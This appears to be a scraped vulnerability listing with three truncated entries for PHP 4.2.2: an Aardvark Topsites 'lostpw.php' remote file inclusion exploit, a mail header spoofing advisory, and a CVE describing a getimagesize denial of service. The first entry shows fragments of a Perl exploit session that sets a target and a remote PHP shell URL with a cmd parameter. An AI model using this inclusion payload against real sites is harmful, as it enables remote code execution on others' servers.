Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion

!/usr/bin/perl Aardvark Topsites PHP All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ to set your PHP shell location: cijfer$ shell=http://my.shell.fi/phpshell.gif?&cmd= php shell set to 'http://my.shell.fi/phpshell.gif?&cmd='...

PHP Mail Function Header Spoofing Vulnerability

The remote host is running a version of PHP = 4.2.2. The mail function does not properly sanitize user input. SPDX-FileCopyrightText: 2002 [email protected] Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders...

CVE-2005-0524

The phphandleiff function in image.c for PHP 4.2.2, 4.3.9, 4.3.10 and 5.0.3, as reachable by the getimagesize PHP function, allows remote attackers to cause a denial of service infinite loop via a -8 size value...